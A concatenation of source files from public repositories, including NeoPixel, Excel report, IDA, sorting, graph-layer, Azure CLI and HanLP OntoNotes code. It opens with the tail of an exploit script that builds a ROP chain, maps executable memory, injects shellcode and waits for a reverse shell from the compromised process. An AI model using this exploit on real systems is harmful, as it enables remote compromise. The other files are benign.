0xdeadbeef,
g.mov_r10_rdx_jmp_rax,
# rdx = prot; do this after r10 since r10's gadget clobbers rdx
g.pop_rdx_pop_rbx,
constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC,
0xdeadbeef,
# r8 = fd
g.pop_rax,
0xffffffffffffffff,
g.mov_r8_rax_mov_rax_r8_pop_rbx,
0xdeadbeef,
# r9 = off
g.pop_rax,
0,
g.mov_r9_rax_pop_r12_pop_r13_mov_rax_r9_pop_r14,
0xdeadbeef,
0xdeadbeef,
0xdeadbeef,
# rax = SYS_mmap
g.pop_rax,
constants.SYS_mmap,
g.syscall,
# back to main one last time...
g.elf_main
)
# read shellcode into the rwx segment and jump to it
do_rop(
# rdi = fd
g.pop_rdi,
constants.STDIN_FILENO,
# rsi = buf
g.pop_rsi_pop_r15,
Const.mmap_base,
0xdeadbeef,
# rdx = len
g.pop_rdx_pop_rbx,
len(shellcode),
0xdeadbeef,
# rax = SYS_read
g.pop_rax,
constants.SYS_read,
g.syscall,
# jump to shellcode
g.pop_rax_call_rax,
Const.mmap_base
)
sleep(5)
log.info("Sending shellcode...")
io.send(shellcode)
callback_io = listen(
bindaddr=Const.final_payload_listen_host,
port=Const.final_payload_listen_port
)
# Make sure our shellcode starts up as expected.
assert recv_shellcode_msg().decode() == Const.hello_msg
log.info("Got hello message from compromised ret2cds process")
# Following a successful write into the target process's address space, we can
# now expect a reverse shell to our listener.
log.info("Waiting for callback...")
callback_io.wait_for_connection()
log.success("Got connection!")
callback_io.interactive()

blob_id: 941380ad326523db2d5fc57631a4e528699b944d | directory_id: 091a6200be74bf6577c86f623665bcc24e16b02b | content_id: fc832ce4e9bb784a6e2f4d290e83e8ed1ca855ac
path: /Sound_Reactive_NeoPixel_Peace_Pendant/code.py | filename: code.py | extension: py | length_bytes: 3,500
repo_name: adafruit/Adafruit_Learning_System_Guides | branch_name: refs/heads/main | snapshot_id: b5f7bce40a16da64e7a79d4b39de032f2cca41d4 | revision_id: 5eaa7a15a437c533b89f359a25983e24bb6b5438
detected_licenses: [MIT] | license_type: permissive | gha_license_id: MIT
visit_date: 2023-09-05T18:31:41.621956 | revision_date: 2023-09-05T15:36:09 | committer_date: 2023-09-05T15:36:09
github_id: 105,065,494 | star_events_count: 937 | fork_events_count: 937 | gha_event_created_at: 2023-09-12T18:48:53 | gha_created_at: 2017-09-27T20:22:44 | gha_language: C
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# SPDX-FileCopyrightText: 2017 Limor Fried for Adafruit Industries
#
# SPDX-License-Identifier: MIT
import array
from rainbowio import colorwheel
import board
import neopixel
from analogio import AnalogIn
led_pin = board.D0 # NeoPixel LED strand is connected to GPIO #0 / D0
n_pixels = 12 # Number of pixels you are using
dc_offset = 0 # DC offset in mic signal - if unsure, leave 0
noise = 100 # Noise/hum/interference in mic signal
samples = 60 # Length of buffer for dynamic level adjustment
top = n_pixels + 1 # Allow dot to go slightly off scale
peak = 0 # Used for falling dot
dot_count = 0 # Frame counter for delaying dot-falling speed
vol_count = 0 # Frame counter for storing past volume data
lvl = 10 # Current "dampened" audio level
min_level_avg = 0 # For dynamic adjustment of graph low & high
max_level_avg = 512
# Collection of prior volume samples
vol = array.array('H', [0] * samples)
mic_pin = AnalogIn(board.A1)
strip = neopixel.NeoPixel(led_pin, n_pixels, brightness=.1, auto_write=True)
def remap_range(value, leftMin, leftMax, rightMin, rightMax):
# this remaps a value from original (left) range to new (right) range
# Figure out how 'wide' each range is
leftSpan = leftMax - leftMin
rightSpan = rightMax - rightMin
# Convert the left range into a 0-1 range (int)
valueScaled = int(value - leftMin) / int(leftSpan)
# Convert the 0-1 range into a value in the right range.
return int(rightMin + (valueScaled * rightSpan))
while True:
n = int((mic_pin.value / 65536) * 1000) # 10-bit ADC format
n = abs(n - 512 - dc_offset) # Center on zero
if n >= noise: # Remove noise/hum
n = n - noise
# "Dampened" reading (else looks twitchy) - divide by 8 (2^3)
lvl = int(((lvl * 7) + n) / 8)
# Calculate bar height based on dynamic min/max levels (fixed point):
height = top * (lvl - min_level_avg) / (max_level_avg - min_level_avg)
# Clip output
if height < 0:
height = 0
elif height > top:
height = top
# Keep 'peak' dot at top
if height > peak:
peak = height
# Color pixels based on rainbow gradient
for i in range(0, len(strip)):
if i >= height:
strip[i] = [0, 0, 0]
else:
strip[i] = colorwheel(remap_range(i, 0, (n_pixels - 1), 30, 150))
# Save sample for dynamic leveling
vol[vol_count] = n
# Advance/rollover sample counter
vol_count += 1
if vol_count >= samples:
vol_count = 0
# Get volume range of prior frames
min_level = vol[0]
max_level = vol[0]
for i in range(1, len(vol)):
if vol[i] < min_level:
min_level = vol[i]
elif vol[i] > max_level:
max_level = vol[i]
# minlvl and maxlvl indicate the volume range over prior frames, used
# for vertically scaling the output graph (so it looks interesting
# regardless of volume level). If they're too close together though
# (e.g. at very low volume levels) the graph becomes super coarse
# and 'jumpy'...so keep some minimum distance between them (this
# also lets the graph go to zero when no sound is playing):
if (max_level - min_level) < top:
max_level = min_level + top
# Dampen min/max levels - divide by 64 (2^6)
min_level_avg = (min_level_avg * 63 + min_level) >> 6
# fake rolling average - divide by 64 (2^6)
max_level_avg = (max_level_avg * 63 + max_level) >> 6
print(n)

blob_id: 2c1789e9c83a887791e46934ce3557f383820348 | directory_id: 307bfc6322390e0ba2703e486cbd511de1be3b72 | content_id: 3e6cf9d514a3f775d3dfce769fee9b8afadbf5b5
path: /Base/BaseExcel.py | filename: BaseExcel.py | extension: py | length_bytes: 7,080
repo_name: Lemonzhulixin/python-appium | branch_name: refs/heads/master | snapshot_id: f646b5bbe7771da818f90ac5ff46ea82fc284eec | revision_id: c5df4773b6bdbdbf13282c485bf4ed11d87e3614
detected_licenses: [] | license_type: no_license | gha_license_id: null
visit_date: 2022-06-23T21:46:27.162099 | revision_date: 2022-06-13T02:41:43 | committer_date: 2022-06-13T02:41:43
github_id: 145,664,879 | star_events_count: 183 | fork_events_count: 72 | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
import xlsxwriter
import os
PATH = lambda p: os.path.abspath(
os.path.join(os.path.dirname(__file__), p)
)
class OperateReport:
def __init__(self, wd):
self.wd = wd
def init(self, worksheet, data, devices):
        # Set the column widths and row heights
worksheet.set_column("A:A", 15)
worksheet.set_column("B:B", 20)
worksheet.set_column("C:C", 20)
worksheet.set_column("D:D", 20)
worksheet.set_column("E:E", 20)
worksheet.set_row(1, 30)
worksheet.set_row(2, 30)
worksheet.set_row(3, 30)
worksheet.set_row(4, 30)
worksheet.set_row(5, 30)
worksheet.set_row(6, 30)
worksheet.set_row(7, 30)
worksheet.set_row(8, 30)
define_format_H1 = get_format(self.wd, {'bold': True, 'font_size': 18})
define_format_H2 = get_format(self.wd, {'bold': True, 'font_size': 14})
define_format_H1.set_border(1)
define_format_H2.set_border(1)
define_format_H1.set_align("center")
define_format_H2.set_align("center")
define_format_H2.set_bg_color("blue")
define_format_H2.set_color("#ffffff")
worksheet.merge_range('A1:E1', '测试报告总概况', define_format_H1)
worksheet.merge_range('A2:E2', '测试用例执行报告汇总', define_format_H2)
_write_center(worksheet, "A3", '名称', self.wd)
_write_center(worksheet, "A4", '包名', self.wd)
_write_center(worksheet, "A5", '版本号', self.wd)
_write_center(worksheet, "A6", '测试日期', self.wd)
_write_center(worksheet, "B3", data['appName'], self.wd)
_write_center(worksheet, "B4", data['packageName'], self.wd)
_write_center(worksheet, "B5", data['appVersion'], self.wd)
_write_center(worksheet, "B6", data['testDate'], self.wd)
_write_center(worksheet, "C3", "用例总数", self.wd)
_write_center(worksheet, "C4", "通过总数", self.wd)
_write_center(worksheet, "C5", "失败总数", self.wd)
_write_center(worksheet, "C6", "测试耗时", self.wd)
_write_center(worksheet, "D3", data['sum'], self.wd)
_write_center(worksheet, "D4", data['pass'], self.wd)
_write_center(worksheet, "D5", data['fail'], self.wd)
_write_center(worksheet, "D6", data['testSumDate'], self.wd)
_write_center(worksheet, "E3", "脚本语言", self.wd)
worksheet.merge_range('E4:E6', 'appium1.8 + python3', get_format_center(self.wd))
_write_center(worksheet, "A8", '机型', self.wd)
_write_center(worksheet, "B8", '通过', self.wd)
_write_center(worksheet, "C8", '失败', self.wd)
temp = 9
for item in devices:
_write_center(worksheet, "A%s" % temp, item["phone_name"], self.wd)
_write_center(worksheet, "B%s" % temp, item["pass"], self.wd)
_write_center(worksheet, "C%s" % temp, item["fail"], self.wd)
temp = temp + 1
pie(self.wd, worksheet)
def detail(self, worksheet, info):
        # Set the column widths and row heights
worksheet.set_column("A:A", 30)
worksheet.set_column("B:B", 20)
worksheet.set_column("C:C", 20)
worksheet.set_column("D:D", 20)
worksheet.set_column("E:E", 20)
worksheet.set_column("F:F", 20)
worksheet.set_column("G:G", 20)
worksheet.set_column("H:H", 20)
worksheet.set_column("I:I", 20)
worksheet.set_column("J:J", 20)
worksheet.set_row(1, 30)
worksheet.set_row(2, 30)
worksheet.set_row(3, 30)
worksheet.set_row(4, 30)
worksheet.set_row(5, 30)
worksheet.set_row(6, 30)
worksheet.set_row(7, 30)
worksheet.set_row(8, 30)
worksheet.set_row(9, 30)
worksheet.set_row(10, 30)
worksheet.merge_range('A1:J1', '测试详情', get_format(self.wd, {'bold': True, 'font_size': 18, 'align': 'center',
'valign': 'vcenter', 'bg_color': 'blue',
'font_color': '#ffffff'}))
_write_center(worksheet, "A2", '机型', self.wd)
_write_center(worksheet, "B2", '用例ID', self.wd)
_write_center(worksheet, "C2", '用例介绍', self.wd)
_write_center(worksheet, "D2", '用例函数', self.wd)
_write_center(worksheet, "E2", '前置条件', self.wd)
_write_center(worksheet, "F2", '操作步骤 ', self.wd)
_write_center(worksheet, "G2", '检查点 ', self.wd)
_write_center(worksheet, "H2", '测试结果 ', self.wd)
_write_center(worksheet, "I2", '备注 ', self.wd)
_write_center(worksheet, "J2", '截图', self.wd)
temp = 3
for item in info:
# print(item)
_write_center(worksheet, "A" + str(temp), item["phoneName"], self.wd)
_write_center(worksheet, "B" + str(temp), item["id"], self.wd)
_write_center(worksheet, "C" + str(temp), item["title"], self.wd)
_write_center(worksheet, "D" + str(temp), item["caseName"], self.wd)
_write_center(worksheet, "E" + str(temp), item["info"], self.wd)
_write_center(worksheet, "F" + str(temp), item["step"], self.wd)
_write_center(worksheet, "G" + str(temp), item["checkStep"], self.wd)
_write_center(worksheet, "H" + str(temp), item["result"], self.wd)
_write_center(worksheet, "I" + str(temp), item.get("msg", ""), self.wd)
if item.get("img", "false") == "false":
_write_center(worksheet, "J" + str(temp), "", self.wd)
worksheet.set_row(temp, 30)
else:
worksheet.insert_image('J' + str(temp), item["img"],
{'x_scale': 0.1, 'y_scale': 0.1, 'border': 1})
worksheet.set_row(temp - 1, 110)
temp = temp + 1
def close(self):
self.wd.close()
def get_format(wd, option={}):
return wd.add_format(option)
# def link_format(wd):
# red_format = wd.add_format({
# 'font_color': 'red',
# 'bold': 1,
# 'underline': 1,
# 'font_size': 12,
# })
def get_format_center(wd, num=1):
return wd.add_format({'align': 'center', 'valign': 'vcenter', 'border': num})
def set_border_(wd, num=1):
return wd.add_format({}).set_border(num)
def _write_center(worksheet, cl, data, wd):
return worksheet.write(cl, data, get_format_center(wd))
def set_row(worksheet, num, height):
worksheet.set_row(num, height)
# Generate the pie chart
def pie(workbook, worksheet):
chart1 = workbook.add_chart({'type': 'pie'})
chart1.add_series({
'name': '自动化测试统计',
'categories': '=测试总况!$C$4:$C$5',
'values': '=测试总况!$D$4:$D$5',
})
chart1.set_title({'name': '测试统计'})
chart1.set_style(10)
worksheet.insert_chart('A9', chart1, {'x_offset': 25, 'y_offset': 10})
if __name__ == '__main__':
pass

blob_id: ca32d3d304a3dfab68b5c8e43c99adf893702f53 | directory_id: 44ca5dc8a807b3b59df201559a68ec9eacdcaef0 | content_id: a985097c5acf324894280919890215a2746ad077
path: /classinformer.py | filename: classinformer.py | extension: py | length_bytes: 890
repo_name: nccgroup/SusanRTTI | branch_name: refs/heads/master | snapshot_id: fdf6733de906703e89c1fda713f4242b3f4741df | revision_id: a0baf99937cd82bedaa9dbae98bfd370eb49cdf3
detected_licenses: [Zlib] | license_type: permissive | gha_license_id: NOASSERTION
visit_date: 2023-08-09T18:15:27.851029 | revision_date: 2023-06-28T21:41:09 | committer_date: 2023-06-28T21:41:09
github_id: 105,178,389 | star_events_count: 179 | fork_events_count: 40 | gha_event_created_at: 2023-07-22T20:09:52 | gha_created_at: 2017-09-28T17:26:14 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# ClassInformer python
# Nicolas Guigo / NCC Group
# Tyler Colgan / NCC Group
# 03/2017
import idaapi
from idc import *
from ida_search import find_text
idaapi.require("utils")
idaapi.require("msvc")
idaapi.require("gcc")
idaapi.require("classdiagram")
from idaapi import auto_is_ok
from msvc import run_msvc
from gcc import run_gcc
from classdiagram import ClassDiagram
def show_classes(classes):
c = ClassDiagram("Class Diagram", classes)
c.Show()
def isGcc():
gcc_info = find_text(0x0, 0, 0, "N10__cxxabiv117__class_type_infoE", SEARCH_CASE|SEARCH_DOWN)
return gcc_info != BADADDR
def main():
print("Starting ClassInformerPython")
if auto_is_ok():
classes = run_gcc() if isGcc() else run_msvc()
print(classes)
show_classes(classes)
else:
print("Take it easy, man")
print("Done")
if __name__ == '__main__':
main()

blob_id: ac06fe0740906ee537aa219f0b01324bddccd481 | directory_id: 9ed4d46aedd4d4acadb48d610e940594b5b7b3fd | content_id: 256952df52d2e520d6a9ce8f70f84ff667085976
path: /sorts/counting_sort.py | filename: counting_sort.py | extension: py | length_bytes: 2,265
repo_name: TheAlgorithms/Python | branch_name: refs/heads/master | snapshot_id: 7596a0e236ed12a61f9db19a7ea68309779cc85b | revision_id: 421ace81edb0d9af3a173f4ca7e66cc900078c1d
detected_licenses: [MIT] | license_type: permissive | gha_license_id: MIT
visit_date: 2023-09-01T17:32:20.190949 | revision_date: 2023-08-29T13:18:10 | committer_date: 2023-08-29T13:18:10
github_id: 63,476,337 | star_events_count: 184,217 | fork_events_count: 48,615 | gha_event_created_at: 2023-09-14T02:05:29 | gha_created_at: 2016-07-16T09:44:01 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
"""
This is a pure Python implementation of the counting sort algorithm
For doctests run the following command:
python -m doctest -v counting_sort.py
or
python3 -m doctest -v counting_sort.py
For manual testing run:
python counting_sort.py
"""
def counting_sort(collection):
"""Pure implementation of counting sort algorithm in Python
:param collection: some mutable ordered collection with heterogeneous
comparable items inside
:return: the same collection ordered by ascending
Examples:
>>> counting_sort([0, 5, 3, 2, 2])
[0, 2, 2, 3, 5]
>>> counting_sort([])
[]
>>> counting_sort([-2, -5, -45])
[-45, -5, -2]
"""
# if the collection is empty, returns empty
if collection == []:
return []
# get some information about the collection
coll_len = len(collection)
coll_max = max(collection)
coll_min = min(collection)
# create the counting array
counting_arr_length = coll_max + 1 - coll_min
counting_arr = [0] * counting_arr_length
    # count how many times each number appears in the collection
for number in collection:
counting_arr[number - coll_min] += 1
    # sum each position with its predecessors. now, counting_arr[i] tells
    # us how many elements <= i are in the collection
for i in range(1, counting_arr_length):
counting_arr[i] = counting_arr[i] + counting_arr[i - 1]
# create the output collection
ordered = [0] * coll_len
# place the elements in the output, respecting the original order (stable
# sort) from end to begin, updating counting_arr
for i in reversed(range(coll_len)):
ordered[counting_arr[collection[i] - coll_min] - 1] = collection[i]
counting_arr[collection[i] - coll_min] -= 1
return ordered
def counting_sort_string(string):
"""
>>> counting_sort_string("thisisthestring")
'eghhiiinrsssttt'
"""
return "".join([chr(i) for i in counting_sort([ord(c) for c in string])])
if __name__ == "__main__":
# Test string sort
assert counting_sort_string("thisisthestring") == "eghhiiinrsssttt"
user_input = input("Enter numbers separated by a comma:\n").strip()
unsorted = [int(item) for item in user_input.split(",")]
print(counting_sort(unsorted))

blob_id: aeabc32bdc2da1c283858884b78a1f44022f794d | directory_id: 9f84d91a8ae3df53b07fe3267992fba00a99ac9e | content_id: f74946060f91e4f639a0984358333be8b92a5d29
path: /torch_geometric/nn/conv/wl_conv_continuous.py | filename: wl_conv_continuous.py | extension: py | length_bytes: 2,349
repo_name: pyg-team/pytorch_geometric | branch_name: refs/heads/master | snapshot_id: ebea601eae228f3905465b5c2349d3fb3bb5cb26 | revision_id: a52af694b8ce6a80811e20966fe6d08a3e7511fe
detected_licenses: [MIT] | license_type: permissive | gha_license_id: MIT
visit_date: 2023-08-31T04:13:40.943308 | revision_date: 2023-08-30T12:48:42 | committer_date: 2023-08-30T12:48:42
github_id: 106,024,057 | star_events_count: 6,775 | fork_events_count: 1,563 | gha_event_created_at: 2023-09-14T17:10:18 | gha_created_at: 2017-10-06T16:03:03 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from typing import Union
from torch import Tensor
from torch_geometric.nn.conv import MessagePassing
from torch_geometric.typing import OptPairTensor, OptTensor, Size
from torch_geometric.utils import scatter
class WLConvContinuous(MessagePassing):
r"""The Weisfeiler Lehman operator from the `"Wasserstein
Weisfeiler-Lehman Graph Kernels" <https://arxiv.org/abs/1906.01277>`_
    paper. Refinement is done through a degree-scaled mean aggregation and
works on nodes with continuous attributes:
.. math::
\mathbf{x}^{\prime}_i = \frac{1}{2}\big(\mathbf{x}_i +
\frac{1}{\textrm{deg}(i)}
\sum_{j \in \mathcal{N}(i)} e_{j,i} \cdot \mathbf{x}_j \big)
where :math:`e_{j,i}` denotes the edge weight from source node :obj:`j` to
target node :obj:`i` (default: :obj:`1`)
Args:
**kwargs (optional): Additional arguments of
:class:`torch_geometric.nn.conv.MessagePassing`.
Shapes:
- **input:**
node features :math:`(|\mathcal{V}|, F)` or
:math:`((|\mathcal{V_s}|, F), (|\mathcal{V_t}|, F))` if bipartite,
edge indices :math:`(2, |\mathcal{E}|)`,
edge weights :math:`(|\mathcal{E}|)` *(optional)*
- **output:** node features :math:`(|\mathcal{V}|, F)` or
:math:`(|\mathcal{V}_t|, F)` if bipartite
"""
def __init__(self, **kwargs):
super().__init__(aggr='add', **kwargs)
def forward(self, x: Union[Tensor, OptPairTensor], edge_index: Tensor,
edge_weight: OptTensor = None, size: Size = None) -> Tensor:
if isinstance(x, Tensor):
x: OptPairTensor = (x, x)
if edge_weight is None:
edge_weight = x[0].new_ones(edge_index.size(1))
# propagate_type: (x: OptPairTensor, edge_weight: Tensor)
out = self.propagate(edge_index, x=x, edge_weight=edge_weight,
size=size)
deg = scatter(edge_weight, edge_index[1], 0, out.size(0), reduce='sum')
deg_inv = 1. / deg
deg_inv.masked_fill_(deg_inv == float('inf'), 0)
out = deg_inv.view(-1, 1) * out
x_dst = x[1]
if x_dst is not None:
out = 0.5 * (x_dst + out)
return out
def message(self, x_j: Tensor, edge_weight: Tensor) -> Tensor:
return edge_weight.view(-1, 1) * x_j
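A hedged usage sketch of the operator defined above (not part of the original file; it assumes WLConvContinuous is exported from torch_geometric.nn as in recent PyTorch Geometric releases, and the toy values are illustrative only):

# Toy check on a two-node undirected graph with one scalar feature per node.
import torch
from torch_geometric.nn import WLConvContinuous

x = torch.tensor([[0.0], [2.0]])             # node features
edge_index = torch.tensor([[0, 1], [1, 0]])  # edges 0 -> 1 and 1 -> 0

conv = WLConvContinuous()
out = conv(x, edge_index)
# Each node becomes 0.5 * (its own feature + degree-scaled sum of neighbours):
# node 0 -> 0.5 * (0.0 + 2.0) = 1.0, node 1 -> 0.5 * (2.0 + 0.0) = 1.0
print(out)  # tensor([[1.], [1.]])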

blob_id: b71721891c8321374aa3efccf187d777498d9a83 | directory_id: a4ea525e226d6c401fdb87a6e9adfdc5d07e6020 | content_id: 9f70434d00883b2408ecbc978b1a3ac13c440ab5
path: /src/azure-cli/azure/cli/command_modules/eventhubs/operations/app_group_custom_file.py | filename: app_group_custom_file.py | extension: py | length_bytes: 3,924
repo_name: Azure/azure-cli | branch_name: refs/heads/dev | snapshot_id: 13340eeca2e288e66e84d393fa1c8a93d46c8686 | revision_id: a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
detected_licenses: [MIT, BSD-3-Clause, LGPL-2.0-or-later, GPL-1.0-or-later, MPL-2.0, LGPL-2.1-only, Apache-2.0, LGPL-2.1-or-later, BSD-2-Clause] | license_type: permissive | gha_license_id: MIT
visit_date: 2023-08-17T06:25:37.431463 | revision_date: 2023-08-17T06:00:10 | committer_date: 2023-08-17T06:00:10
github_id: 51,040,886 | star_events_count: 4,018 | fork_events_count: 3,310 | gha_event_created_at: 2023-09-14T11:11:05 | gha_created_at: 2016-02-04T00:21:51 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
def create_app_group_policy_object(col):
policy_object = {}
policy_object.update({
"name": col["name"],
"type": "ThrottlingPolicy",
})
if "rateLimitThreshold" in col and "metricId" in col:
policy_object.update({
"throttling_policy": {
"rate_limit_threshold": col["rateLimitThreshold"],
"metric_id": col["metricId"]
}
})
return policy_object
def cli_appgroup_create(cmd, resource_group_name, namespace_name, application_group_name, client_app_group_identifier,
throttling_policy_config=None, is_enabled=None):
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Create
command_args_dict = {}
command_args_dict.update({
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name,
"is_enabled": is_enabled,
"client_app_group_identifier": client_app_group_identifier,
"policies": throttling_policy_config
})
return Create(cli_ctx=cmd.cli_ctx)(command_args=command_args_dict)
def cli_add_appgroup_policy(cmd, resource_group_name, namespace_name, application_group_name, throttling_policy_config):
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Update
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Show
application_group = Show(cli_ctx=cmd.cli_ctx)(command_args={
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name
})
policy_object = []
for obj in application_group["policies"]:
policy = create_app_group_policy_object(obj)
policy_object.append(policy)
for obj in throttling_policy_config:
if obj not in policy_object:
policy_object.append(obj)
return Update(cli_ctx=cmd.cli_ctx)(command_args={
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name,
"policies": policy_object
})
def cli_remove_appgroup_policy(cmd, resource_group_name, namespace_name, application_group_name, policy):
from azure.cli.core.azclierror import ResourceNotFoundError
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Update
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Show
application_group = Show(cli_ctx=cmd.cli_ctx)(command_args={
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name
})
policy_object = []
for i in policy:
semaphor = 0
for j in application_group["policies"]:
if i["name"] == j["name"]:
application_group["policies"].remove(j)
semaphor = 1
if semaphor == 0:
raise ResourceNotFoundError('The following policy was not found: Name: ' + i["name"])
for col in application_group["policies"]:
policy_object.append(create_app_group_policy_object(col))
return Update(cli_ctx=cmd.cli_ctx)(command_args={
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name,
"policies": policy_object
})

blob_id: 947a2a8704638984f37bdbc7d793821aeca4ab19 | directory_id: dd221d1ab80a49190a0c93277e2471debaa2db95 | content_id: 43fc05752f302236188cece0cf4cea27deaf437d
path: /hanlp/datasets/srl/ontonotes5/_utils.py | filename: _utils.py | extension: py | length_bytes: 25,086
repo_name: hankcs/HanLP | branch_name: refs/heads/doc-zh | snapshot_id: 29a22d4e240617e4dc67929c2f9760a822402cf7 | revision_id: be2f04905a12990a527417bd47b79b851874a201
detected_licenses: [Apache-2.0, CC-BY-NC-SA-4.0] | license_type: permissive | gha_license_id: Apache-2.0
visit_date: 2023-08-18T12:48:43.533453 | revision_date: 2020-02-15T17:19:28 | committer_date: 2023-03-14T02:46:03
github_id: 24,976,755 | star_events_count: 32,454 | fork_events_count: 9,770 | gha_event_created_at: 2023-08-13T03:11:39 | gha_created_at: 2014-10-09T06:36:16 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
#!/usr/bin/env python
import codecs
import collections
import glob
import json
import os
import re
import sys
from pprint import pprint
from typing import List, Dict, Union
from hanlp_common.io import eprint, save_json
from hanlp.common.transform import NormalizeToken
from hanlp.datasets.parsing.loaders._ctb_utils import remove_all_ec, convert_to_dependency
from hanlp.datasets.parsing.ptb import PTB_TOKEN_MAPPING
from hanlp.utils.io_util import merge_files, get_resource, pushd, run_cmd, read_tsv_as_sents, replace_ext, \
get_exitcode_stdout_stderr
from hanlp.utils.log_util import flash
BEGIN_DOCUMENT_REGEX = re.compile(r"#begin document \((.*)\); part (\d+)")
def flatten(l):
return [item for sublist in l for item in sublist]
def get_doc_key(doc_id, part):
return "{}_{}".format(doc_id, int(part))
class DocumentState(object):
def __init__(self):
self.doc_key = None
self.text = []
self.text_speakers = []
self.speakers = []
self.sentences = []
self.pos = []
self.lemma = []
self.pos_buffer = []
self.lemma_buffer = []
self.constituents = [] # {}
self.const_stack = []
self.const_buffer = []
self.ner = []
self.ner_stack = []
self.ner_buffer = []
self.srl = []
self.argument_stacks = []
self.argument_buffers = []
self.predicate_buffer = []
self.clusters = collections.defaultdict(list)
self.coref_stacks = collections.defaultdict(list)
def assert_empty(self):
assert self.doc_key is None
assert len(self.text) == 0
assert len(self.text_speakers) == 0
assert len(self.speakers) == 0
assert len(self.sentences) == 0
assert len(self.srl) == 0
assert len(self.predicate_buffer) == 0
assert len(self.argument_buffers) == 0
assert len(self.argument_stacks) == 0
assert len(self.constituents) == 0
assert len(self.const_stack) == 0
assert len(self.const_buffer) == 0
assert len(self.ner) == 0
assert len(self.lemma_buffer) == 0
assert len(self.pos_buffer) == 0
assert len(self.ner_stack) == 0
assert len(self.ner_buffer) == 0
assert len(self.coref_stacks) == 0
assert len(self.clusters) == 0
def assert_finalizable(self):
assert self.doc_key is not None
assert len(self.text) == 0
assert len(self.text_speakers) == 0
assert len(self.speakers) > 0
assert len(self.sentences) > 0
assert len(self.constituents) > 0
assert len(self.const_stack) == 0
assert len(self.ner_stack) == 0
assert len(self.predicate_buffer) == 0
assert all(len(s) == 0 for s in list(self.coref_stacks.values()))
def finalize_sentence(self):
self.sentences.append(tuple(self.text))
del self.text[:]
self.lemma.append(tuple(self.lemma_buffer))
del self.lemma_buffer[:]
self.pos.append(tuple(self.pos_buffer))
del self.pos_buffer[:]
self.speakers.append(tuple(self.text_speakers))
del self.text_speakers[:]
assert len(self.predicate_buffer) == len(self.argument_buffers)
self.srl.append([])
for pred, args in zip(self.predicate_buffer, self.argument_buffers):
for start, end, label in args:
self.srl[-1].append((pred, start, end, label))
self.predicate_buffer = []
self.argument_buffers = []
self.argument_stacks = []
self.constituents.append([c for c in self.const_buffer])
self.const_buffer = []
self.ner.append([c for c in self.ner_buffer])
self.ner_buffer = []
def finalize(self):
merged_clusters = []
for c1 in list(self.clusters.values()):
existing = None
for m in c1:
for c2 in merged_clusters:
if m in c2:
existing = c2
break
if existing is not None:
break
if existing is not None:
print("Merging clusters (shouldn't happen very often.)")
existing.update(c1)
else:
merged_clusters.append(set(c1))
merged_clusters = [list(c) for c in merged_clusters]
all_mentions = flatten(merged_clusters)
assert len(all_mentions) == len(set(all_mentions))
assert len(self.sentences) == len(self.srl)
assert len(self.sentences) == len(self.constituents)
assert len(self.sentences) == len(self.ner)
return {
"doc_key": self.doc_key,
"sentences": self.sentences,
"lemma": self.lemma,
"pos": self.pos,
"speakers": self.speakers,
"srl": self.srl,
"constituents": self.constituents,
"ner": self.ner,
"clusters": merged_clusters
}
def filter_data(input_json_file, output_json_file, doc_ids_file=None, annotation=None):
"""Filter OntoNotes5 data based on CoNLL2012 (coref) doc ids.
https://github.com/bcmi220/unisrl/blob/master/scripts/filter_conll2012_data.py
Args:
input_json_file: All documents.
output_json_file:
doc_ids_file:
Returns:
"""
assert doc_ids_file or annotation
doc_count = 0
sentence_count = 0
srl_count = 0
ner_count = 0
cluster_count = 0
word_count = 0
missing_count = 0
doc_ids = []
doc_ids_to_keys = collections.defaultdict(list)
filtered_examples = {}
ontonotes_root = os.path.abspath(os.path.join(os.path.dirname(input_json_file), *['..'] * 2))
language = os.path.basename(input_json_file).split('.')[1]
if doc_ids_file:
with open(doc_ids_file, "r") as f:
for line in f:
doc_id = line.strip().split("annotations/")[1]
doc_ids.append(doc_id)
doc_ids_to_keys[doc_id] = []
f.close()
with codecs.open(input_json_file, "r", "utf8") as f:
for jsonline in f:
example = json.loads(jsonline)
doc_key = example["doc_key"]
dk_prefix = "_".join(doc_key.split("_")[:-1])
if doc_ids_file and dk_prefix not in doc_ids_to_keys:
continue
if annotation and not os.path.isfile(
os.path.join(ontonotes_root, 'data/files/data', language, 'annotations', dk_prefix) + annotation):
print(os.path.join(ontonotes_root, 'data/files/data', language, 'annotations', dk_prefix) + annotation)
missing_count += 1
continue
doc_ids_to_keys[dk_prefix].append(doc_key)
filtered_examples[doc_key] = example
sentences = example["sentences"]
word_count += sum([len(s) for s in sentences])
sentence_count += len(sentences)
srl_count += sum([len(srl) for srl in example["srl"]])
ner_count += sum([len(ner) for ner in example["ner"]])
coref = example["clusters"]
cluster_count += len(coref)
doc_count += 1
f.close()
print(("Documents: {}\nSentences: {}\nWords: {}\nNER: {}, PAS: {}, Clusters: {}, No annotations: {}".format(
doc_count, sentence_count, word_count, ner_count, srl_count, cluster_count, missing_count)))
if doc_ids_file:
